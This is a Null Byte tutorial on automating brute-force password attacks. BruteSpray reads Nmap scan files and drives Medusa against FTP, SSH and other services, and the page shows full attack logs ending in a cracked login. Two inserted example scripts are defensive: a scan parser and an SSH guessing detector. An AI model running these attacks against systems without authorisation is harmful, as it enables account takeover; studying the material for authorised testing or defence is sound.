
Automating Brute Force Attacks for Nmap Scans «Null Byte :: WonderHowTo



Using Hydra, Ncrack, and other brute-forcing tools to crack passwords can be frustrating and confusing. To make the process easier, let's discuss automating and optimizing brute-force attacks against potentially vulnerable services such as SMTP, SSH, IMAP, and FTP that have been discovered by Nmap, a popular network scanning tool.

BruteSpray, developed by Jacob Robles and Shane Young, is a Python script that processes Nmap scan output and automates brute-force attacks against the discovered services using Medusa, a popular brute-forcing tool. BruteSpray is the much-needed link between Nmap scans and brute-force attacks.

Step 1: Set up BruteSpray and Medusa

An older version of BruteSpray can be found in the Kali repositories. To avoid potential confusion, any version of BruteSpray that is already installed should be removed with the apt-get command below.

  ~ $ apt-get autoremove brutespray

Reading package lists... Done
Building dependency tree
Reading state information... Done
Package 'brutespray' is not installed, so not removed
The following packages will be REMOVED:
libgit2-27
0 upgraded, 0 newly installed, 1 to remove and 1841 not upgraded.
After this operation, 1,073 kB disk space will be freed.
Do you want to continue? [Y/n] Y
(Reading database ... 417689 files and directories currently installed.)
Removing libgit2-27:amd64 (0.27.7+dfsg.1-0.2+b1) ...
Processing triggers for libc-bin (2.29-3) ...

Next, clone the BruteSpray repository.

  ~ $ git clone https://github.com/x90skysn3k/brutespray.git

Cloning into 'brutespray'...
remote: Enumerating objects: 15, done.
remote: Counting objects: 100% (15/15), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 506 (delta 4), reused 1 (delta 0), pack-reused 491
Receiving objects: 100% (506/506), 113.29 KiB | 2.31 MiB/s, done.
Resolving deltas: 100% (211/211), done.

Next, cd into the "brutespray" folder and use pip, a tool for installing and managing Python packages, to install the BruteSpray dependencies.

  ~ $ cd brutespray/

The following command is required to run BruteSpray. The argument -r instructs pip to install the dependencies in the "requirements.txt" file.

  ~/brutespray $ pip install -r requirements.txt

Collecting argcomplete==1.10.0
Downloading https://files.pythonhosted.org/packages/4d/82/f44c9661e479207348a979b1f6f063625d11dc4ca6256af053719bbb0124/argcomplete-1.10.0-py2.py3-none-any.whl
Installing collected packages: argcomplete
Successfully installed argcomplete-1.10.0

Finally, install Medusa. This can be done with the command below.

  ~/brutespray $ apt-get install medusa

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages will be upgraded:
medusa
1 upgraded, 0 newly installed, 0 to remove and 1840 not upgraded.
Need to get 0 B/154 kB of archives.
After this operation, 27.6 kB disk space will be freed.
Reading changelogs... Done
(Reading database ... 417682 files and directories currently installed.)
Preparing to unpack .../medusa_2.2-6+b1_amd64.deb ...
Unpacking medusa (2.2-6+b1) over (2.2-6) ...
Setting up medusa (2.2-6+b1) ...
Processing triggers for man-db (2.8.5-2) ...

The --help argument can be used to check that BruteSpray works correctly and to view the available options.

  ~/brutespray $ ./brutespray.py --help

brutespray.py v1.6.6
Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail
Inspired by: Leon Johnson/@sho-luv
Thanks to Medusa: JoMo-Kun / Foofus Networks

usage: brutespray.py [-h] [-f FILE] [-o OUTPUT] [-s SERVICE] [-t THREADS]
                     [-T HOSTS] [-U USERLIST] [-P PASSLIST] [-u USERNAME]
                     [-p PASSWORD] [-c] [-i] [-m]

  usage: python brutespray.py 

optional arguments:
  -h, --help            show this help message and exit

Menu options:
  -f FILE, --file FILE  GNMAP, JSON or XML file to parse
  -o OUTPUT, --output OUTPUT
                        directory containing successful attempts
  -s SERVICE, --service SERVICE
                        specify the service to attack
  -t THREADS, --threads THREADS
                        number of medusa threads
  -T HOSTS, --hosts HOSTS
                        number of hosts to test concurrently
  -U USERLIST, --userlist USERLIST
                        reference a custom username file
  -P PASSLIST, --passlist PASSLIST
                        reference a custom password file
  -u USERNAME, --username USERNAME
                        specify a single username
  -p PASSWORD, --password PASSWORD
                        specify a single password
  -c, --continuous      keep brute-forcing after success
  -i, --interactive     interactive mode
  -m, --modules         dump a list of available modules to brute

That's it for downloading BruteSpray and installing dependencies – no adjustments or configurations are needed.

Other things that will be useful for following along with this tutorial are Nmap (of course), a general understanding of how Nmap works, and a simple wordlist for password-guessing attacks. If you do not have Nmap yet, it can be downloaded and installed with the command below.

  ~/brutespray $ apt-get install nmap

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following package was automatically installed and is no longer required:
liblinear3
Use 'apt autoremove' to remove it.
The following additional packages will be installed:
liblinear4 nmap-common
Suggested packages:
liblinear-tools liblinear-dev ncat
The following NEW packages will be installed:
liblinear4
The following packages will be upgraded:
nmap nmap-common
2 upgraded, 1 newly installed, 0 to remove and 1838 not upgraded.
Need to get 43.6 kB/5,999 kB of archives.
After this operation, 309 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 liblinear4 amd64 2.3.0+dfsg-3 [43.6 kB]
Fetched 43.6 kB in 1s (32.2 kB/s)
Reading changelogs... Done
Selecting previously unselected package liblinear4:amd64.
(Reading database ... 417683 files and directories currently installed.)
Preparing to unpack .../liblinear4_2.3.0+dfsg-3_amd64.deb ...
Unpacking liblinear4:amd64 (2.3.0+dfsg-3) ...
Preparing to unpack .../nmap_7.80+dfsg1-2kali1_amd64.deb ...
Unpacking nmap (7.80+dfsg1-2kali1) over (7.70+dfsg1-6kali1) ...
Preparing to unpack .../nmap-common_7.80+dfsg1-2kali1_all.deb ...
Unpacking nmap-common (7.80+dfsg1-2kali1) over (7.70+dfsg1-6kali1) ...
Setting up liblinear4:amd64 (2.3.0+dfsg-3) ...
Setting up nmap-common (7.80+dfsg1-2kali1) ...
Setting up nmap (7.80+dfsg1-2kali1) ...
Processing triggers for man-db (2.8.5-2) ...
Processing triggers for libc-bin (2.29-3) ...

The wordlist that I use in this guide can be downloaded with the following command. You can of course use any wordlist you like, whether from leaked password databases, other online wordlists, or custom wordlist-building tools such as Mentalist, CeWL, and Crunch.

  ~/brutespray $ wget 'https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt'

--2020-01-13 18:59:31-- https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25585 (25K) [text/plain]
Saving to: "1wordlist2rulethem@ll.txt"

1wordlist2rulethem@ 100%[===================>] 24.99K --.-KB/s in 0.04s

2020-01-13 18:59:31 (645 KB/s) - "1wordlist2rulethem@ll.txt" saved [25585/25585]

Step 2: Generate Nmap output files

BruteSpray requires an Nmap output file to function. These files can be created with Nmap's -oX or -oG arguments, as shown in the Nmap command below. The -sV argument tells Nmap to probe open ports to determine service and version information.

The -oG argument is the most important one here. It stores the Nmap output in a local file in grepable format, which allows BruteSpray to process the services and ports on the target server effectively. Similarly, the -oX argument stores the Nmap output in XML format, which BruteSpray also supports but which is less readable for humans.

  ~/brutespray $ nmap -sVTU -p ports TargetServer -oG filename.gnmap

Here is my example of this command and the output:

  ~/brutespray $ nmap -sVTU -p21,22,137,161 1X.XXX.XXX.103 -oG tokyoneon.gnmap

Starting Nmap 7.80 (https://nmap.org)
Nmap scan report for 1X.XXX.XXX.103
Host is up (0.00018s latency).

PORT     STATE   SERVICE     VERSION
21/tcp   open    ftp         vsftpd 3.0.3
22/tcp   open    ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
137/tcp  closed  netbios-ns
161/tcp  closed  snmp
21/udp   closed  ftp
22/udp   closed  ssh
137/udp  open    netbios-ns  Samba nmbd netbios-ns (workgroup: WORKGROUP)
161/udp  open    snmp        SNMPv1 server; net-snmp SNMPv3 server (public)
MAC Address: 6C:DB:XX:XX:XX:XX (XXXXX)
Service Info: Host: XXXXX; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds

Replace "ports" above with the ports you want to scan, "TargetServer" with the IP address of your target, and "filename" with the name that you want to give the file. Once the scan is done, the newly created .gnmap file can be viewed with the cat command.

  ~/brutespray $ cat filename.gnmap

For me, after executing my example command:

  ~/brutespray $ cat tokyoneon.gnmap

# Nmap 7.80 scan initiated Thu Apr 12 18:34:07 2018 as: nmap -sVTU -p21,22,137,161 -oG tokyoneon.gnmap 1X.XXX.XXX.103
Host: 1X.XXX.XXX.103 () Status: Up
Host: 1X.XXX.XXX.103 () Ports: 21/open/tcp//ftp//vsftpd 3.0.3/, 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)/, 137/closed/tcp//netbios-ns///, 161/closed/tcp//snmp///, 21/closed/udp//ftp///, 22/closed/udp//ssh///, 137/open/udp//netbios-ns//Samba nmbd netbios-ns (workgroup: WORKGROUP)/, 161/open/udp//snmp//SNMPv1 server; net-snmp SNMPv3 server (public WORKGROUP)/
# Nmap done at Thu Apr 12 18:35:55 2018 -- 1 IP address (1 host up) scanned in 0.60 seconds

Note the "open" ports that Nmap has discovered, since these services are now available for automated brute-force attacks.

Step 3: Automate Brute Force attacks with BruteSpray

BruteSpray currently supports nearly two dozen services by default. The supported services can be viewed with the --modules argument. They include SSH, FTP, Telnet, VNC, MsSQL, MySQL, PostgreSQL, RSH, IMAP, NNTP, pcAnywhere, POP3, rexec, rlogin, SMBNT, SMTP, SVN, vmauthd and SNMP.

  ~/brutespray $ ./brutespray.py --modules

Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail
Supported services:

ssh
ftp
telnet
vnc
mssql
mysql
postgresql
rsh
imap
nntp
pcanywhere
pop3
rexec
rlogin
smbnt
smtp
svn
vmauthd
snmp
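Added example, not part of the original article or of BruteSpray's code: a small parser for the grepable (-oG) format from Step 2 that reports which open ports run one of the services listed above, so you can review your own scan results for password-authenticated services that should not be reachable. The sample input and the 192.0.2.10 address are constructed, and the function names are hypothetical.

```python
import re

# Service names taken from the --modules list shown on this page.
PASSWORD_SERVICES = {
    "ssh", "ftp", "telnet", "vnc", "mssql", "mysql", "postgresql", "rsh",
    "imap", "nntp", "pcanywhere", "pop3", "rexec", "rlogin", "smbnt",
    "smtp", "svn", "vmauthd", "snmp",
}

# Constructed sample in grepable format, modelled on the scan in Step 2.
# 192.0.2.10 is an RFC 5737 documentation address, not a real host.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated as: nmap -sVTU -p21,22,137,161 -oG sample.gnmap 192.0.2.10
Host: 192.0.2.10 ()\tStatus: Up
Host: 192.0.2.10 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, 22/open/tcp//ssh//OpenSSH 7.2p2/, 137/closed/tcp//netbios-ns///, 161/open/udp//snmp//net-snmp/, 161/closed/tcp//snmp///
# Nmap done -- 1 IP address (1 host up) scanned
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)")
# Each port entry is: port/state/protocol/owner/service/rpc-info/version/
PORT_RE = re.compile(r"(\d+)/([^/]*)/([^/]*)/[^/]*/([^/]*)/[^/]*/([^/]*)/")


def parse_gnmap(text):
    """Return one dict per port entry found in grepable Nmap output."""
    ports = []
    for line in text.splitlines():
        host = HOST_RE.match(line)
        if not host or "Ports:" not in line:
            continue  # comment lines and "Status:" lines carry no ports
        # Other tab-separated fields (e.g. "Ignored State:") can follow the list.
        port_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for m in PORT_RE.finditer(port_field):
            port, state, proto, service, version = m.groups()
            ports.append({
                "host": host.group(1),
                "port": int(port),
                "state": state,
                "proto": proto,
                "service": service,
                "version": version,
            })
    return ports


def exposed_login_services(text):
    """Sorted (host, port, proto, service) tuples for open password services."""
    found = set()
    for p in parse_gnmap(text):
        if p["state"] == "open" and p["service"] in PASSWORD_SERVICES:
            found.add((p["host"], p["port"], p["proto"], p["service"]))
    return sorted(found)


if __name__ == "__main__":
    for host, port, proto, service in exposed_login_services(SAMPLE_GNMAP):
        print(f"{host} {port}/{proto} {service}")
```

Only ports whose state is exactly "open" are reported; closed ports and services outside the list above are ignored.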

1. Interactive mode

The -i argument enables interactive mode, a guided mode designed to maximize ease of use.

  ~/brutespray $ ./brutespray.py --file filename.gnmap -i

--------------------------------------------

./brutespray.py --file tokyoneon.gnmap -i

Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail

Welcome to interactive mode!

WARNING: If you leave an option blank, it will remain empty and the default setting will be used

Available services to brute-force:
Service: ftp on port 21 with 1 hosts
Service: snmp on port 161 with 1 hosts
Service: ssh on port 22 with 1 hosts

Enter services you want to brute - default all (ssh,ftp,etc):

Simply follow the prompts and the brute-force attack will begin.

  Enter services you want to brute - default all (ssh,ftp,etc): ftp
Enter the number of parallel threads (default is 2): 1
Enter the number of parallel hosts to scan per service (default is 1): 1
Would you like to specify a wordlist? (y/n): n
Would you like to specify a single username or password (y/n): y
Enter a username: user
Enter a password:

Starting to brute, please make sure to use the right amount of threads (-t) and parallel hosts (-T)...
Output will be written to the folder: ./brutespray-output/

Brute-forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456 (1 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456789 (2 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: password (3 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: success (4 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: asdfghjkl (5 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 11111111 (6 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: iloveyou (7 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: letmein (8 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: wonderhow2 (9 of 9 complete)
ACCOUNT FOUND: [ftp] Host: 1X.XXX.XXX.103 User: user Password: wonderhow2 [SUCCESS]

2. Target Individual Services

A single service can be targeted by using the --service argument and specifying the protocol. If the --username argument is not specified when using --service, BruteSpray uses the default user list in the wordlist/ssh/user file. This list of usernames can be changed at any time.

  ~/brutespray $ ./brutespray.py --file filename.gnmap --service ssh

--------------------------------------------

./brutespray.py --file tokyoneon.gnmap --service ssh

Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail

Starting to brute, please make sure to use the right amount of threads (-t) and parallel hosts (-T)...
Output will be written to the folder: ./brutespray-output/

Brute-forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: 123456 (1 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: 123456789 (2 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: password (3 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: success (4 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: asdfghjkl (5 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: 11111111 (6 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: iloveyou (7 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: letmein (8 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: root (1 of 3, 1 complete) Password: wonderhow2 (9 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: 123456 (1 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: 123456789 (2 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (2 of 3, 1 complete) Password: 123456 (1 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: password (3 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (2 of 3, 1 complete) Password: 123456789 (2 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (2 of 3, 1 complete) Password: password (3 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: success (4 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: asdfghjkl (5 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (2 of 3, 1 complete) Password: success (4 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (3 of 3, 1 complete) Password: 11111111 (6 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (3 of 3, 1 complete) Password: asdfghjkl (5 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (3 of 3, 1 complete) Password: 11111111 (6 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (3 of 3, 1 complete) Password: iloveyou (7 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (3 of 3, 1 complete) Password: letmein (8 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (3 of 3, 1 complete) Password: iloveyou (7 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: admin (3 of 3, 1 complete) Password: wonderhow2 (9 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (3 of 3, 2 complete) Password: letmein (8 of 9 complete)
ACCOUNT CHECK: [ssh] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (3 of 3, 2 complete) Password: wonderhow2 (9 of 9 complete)

ACCOUNT FOUND: [ssh] Host: 1X.XXX.XXX.103 User: user Password: wonderhow2 [SUCCESS]
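Added example, not part of the original article: what a run like the SSH one above looks like from the server side, and how to flag it. The script counts failed OpenSSH password logins per source address and reports any account that then logs in successfully from the same source. The log lines are constructed, the function names are hypothetical, and the code counts across the whole input rather than within a time window.

```python
import re
from collections import defaultdict

# OpenSSH password-auth results as written to auth.log or the journal.
AUTH_RE = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) password for (?:invalid user )?(\S+) "
    r"from (\S+) port \d+"
)


def build_sample_log():
    """Constructed log lines (not from the page): 3 users x 9 guesses from one
    source, the last guess succeeding, plus one ordinary mistyped login.
    Addresses come from the RFC 5737 documentation ranges."""
    lines, n = [], 0
    for user in ("root", "admin", "user"):
        # Assumption: "admin" does not exist on the server, so sshd logs it
        # as an invalid user.
        who = "invalid user admin" if user == "admin" else user
        for attempt in range(1, 10):
            hit = user == "user" and attempt == 9
            verb = "Accepted" if hit else "Failed"
            lines.append(
                f"Jan 13 19:00:{n:02d} target sshd[{2000 + n}]: {verb} password "
                f"for {who} from 198.51.100.7 port {40000 + n} ssh2"
            )
            n += 1
    lines.append("Jan 13 19:05:10 target sshd[3001]: Failed password for alice "
                 "from 203.0.113.5 port 51000 ssh2")
    lines.append("Jan 13 19:05:21 target sshd[3002]: Accepted password for alice "
                 "from 203.0.113.5 port 51002 ssh2")
    return lines


def detect_guessing(lines, min_failures=10):
    """Return {source_ip: summary} for sources with at least min_failures
    failed password logins. 'accepted_after' lists accounts that logged in
    from that source once the threshold had been reached."""
    stats = defaultdict(
        lambda: {"failures": 0, "users": set(), "accepted_after": []}
    )
    for line in lines:
        m = AUTH_RE.search(line)
        if not m:
            continue
        result, user, src = m.groups()
        entry = stats[src]
        if result == "Failed":
            entry["failures"] += 1
            entry["users"].add(user)
        elif entry["failures"] >= min_failures:
            # A success right after a burst of failures: treat the account
            # as compromised until its password has been rotated.
            entry["accepted_after"].append(user)
    return {s: e for s, e in stats.items() if e["failures"] >= min_failures}


if __name__ == "__main__":
    for src, e in detect_guessing(build_sample_log()).items():
        print(src, e["failures"], sorted(e["users"]), e["accepted_after"])
```

The single mistyped login from 203.0.113.5 stays below the threshold and is not reported, while the 26 failures followed by a success from 198.51.100.7 are.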

3. Configuring custom word lists and user names (optional)

There are small built-in wordlists and user lists that are used automatically when a particular service is brute-forced. The 'password' file in the wordlist/ssh/ directory, for example, contains the passwords that are used when brute-forcing SSH services. Each supported service has its own folder in the wordlist/ directory.

  ~/brutespray $ ls -F wordlist/

ftp/ mssql/ nntp/ postgres/ rlogin/ smbnt/ ssh/ telnet/ vnc/
imap/ mysql/ pcanywhere/ rexec/ rsh/ smtp/ svn/ vmauthd/

The built-in wordlists can be changed manually by using the cp command to copy a custom wordlist over them.

  ~/brutespray $ cp /path/to/customPasswords.list wordlist/ssh/password

Built-in username lists can also be changed with the command below.

  ~/brutespray $ cp /path/to/customUser.list wordlist/vnc/user

Alternatively, custom password and username lists can be supplied on the command line with the --passlist and --username arguments.

  ~/brutespray $ ./brutespray.py --file filename.gnmap --username UsernameHere --passlist /path/to/desired/passwords.list --service ftp

--------------------------------------------

./brutespray.py --file tokyoneon.gnmap --passlist /root/to/Desktop/passwords.list --service ftp

Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail
Starting to brute, please make sure to use the right amount of threads (-t) and parallel hosts (-T)...
Output will be written to the folder: ./brutespray-output/

Brute-forcing...
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456 (1 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 123456789 (2 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: password (3 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: success (4 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: asdfghjkl (5 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: 11111111 (6 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: iloveyou (7 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: letmein (8 of 9 complete)
ACCOUNT CHECK: [ftp] Host: 1X.XXX.XXX.103 (1 of 1, 0 complete) User: user (1 of 1, 0 complete) Password: wonderhow2 (9 of 9 complete)
ACCOUNT FOUND: [ftp] Host: 1X.XXX.XXX.103 User: user Password: wonderhow2 [SUCCESS]

These are just a few examples. If you need more help with this, leave a comment below or message me on Twitter @tokyoneon_.

Cover photo by Jefferson Santos/PEXELS; screenshots by tokyoneon/Null Byte



